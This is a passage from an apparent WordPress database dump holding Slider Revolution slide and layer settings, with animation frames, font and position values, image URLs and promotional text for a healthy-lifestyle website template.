From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3500,\"startRelative\":1990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"10\":{\"text\":\"Packed with everything you\'ll need for creating an incredible website dedicated to healthy lifestyle & nutrition.\\n\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"532px\",\"e\":true},\"n\":{\"v\":\"532px\",\"e\":true},\"t\":{\"v\":\"375px\",\"e\":true},\"m\":{\"v\":\"333px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"82px\",\"e\":true}},\"originalWidth\":\"532px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-15px\",\"e\":true},\"n\":{\"v\":\"-15px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"95px\",\"e\":true},\"n\":{\"v\":\"95px\",\"e\":true},\"t\":{\"v\":\"-5px\",\"e\":true},\"m\":{\"v\":\"-5px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3500,\"startRelative\":3190,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"27px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(24,10,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#ba886a\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Papir\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-slide4-graphic2.png\",\"imageId\":3505},\"size\":{\"width\":{\"d\":{\"v\":\"982px\",\"e\":true},\"n\":{\"v\":\"1054px\",\"e\":true},\"t\":{\"v\":\"1130px\",\"e\":true},\"m\":{\"v\":\"777px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"924px\",\"e\":true},\"n\":{\"v\":\"992px\",\"e\":true},\"t\":{\"v\":\"1063px\",\"e\":true},\"m\":{\"v\":\"731px\",\"e\":true}},\"originalWidth\":914,\"originalHeight\":860,\"aspectRatio\":{\"d\":{\"v\":1.0627906976744185829630851003457792103290557861328125},\"n\":{\"v\":1.0627906976744185829630851003457792103290557861328125},\"t\":{\"v\":1.0627906976744185829630851003457792103290557861328125},\"m\":{\"v\":1.0627906976744185829630851003457792103290557861328125}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"4px\",\"e\":true},\"m\":{\"v\":\"-112px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-2px\",\"e\":true},\"n\":{\"v\":\"-2px\",\"e\":true},\"t\":{\"v\":\"-17px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"2\":{\"text\":\"START SELLING NOW\",\"alias\":\"Subtitlle\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"-5px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-313px\",\"e\":true},\"n\":{\"v\":\"-275px\",\"e\":true},\"t\":{\"v\":\"-299px\",\"e\":true},\"m\":{\"v\":\"38px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"10px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"3px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"v\":\"3px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Image 4\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-slide4-graphic1.png\",\"imageId\":3509},\"size\":{\"width\":{\"d\":{\"v\":\"593px\",\"e\":true},\"n\":{\"v\":\"480px\",\"e\":true},\"t\":{\"v\":\"601px\",\"e\":true},\"m\":{\"v\":\"291px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"1124px\",\"e\":true},\"n\":{\"v\":\"910px\",\"e\":true},\"t\":{\"v\":\"1140px\",\"e\":true},\"m\":{\"v\":\"551px\",\"e\":true}},\"originalWidth\":593,\"originalHeight\":1124,\"aspectRatio\":{\"d\":{\"v\":0.5275800711743772186679279911913909018039703369140625},\"n\":{\"v\":0.5275800711743772186679279911913909018039703369140625},\"t\":{\"v\":0.5275800711743772186679279911913909018039703369140625},\"m\":{\"v\":0.5275800711743772186679279911913909018039703369140625}}},\"position\":{\"x\":{\"d\":{\"v\":\"387px\",\"e\":true},\"n\":{\"v\":\"342px\",\"e\":true},\"t\":{\"v\":\"-66px\",\"e\":true},\"m\":{\"v\":\"11px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"174px\",\"e\":true},\"n\":{\"v\":\"176px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 